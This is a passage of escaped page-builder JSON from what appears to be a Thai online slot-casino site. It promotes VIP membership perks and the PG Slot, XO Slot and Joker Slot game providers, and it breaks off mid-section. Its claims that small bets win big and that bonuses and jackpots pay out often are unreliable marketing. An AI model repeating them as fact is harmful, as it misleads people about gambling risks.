\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 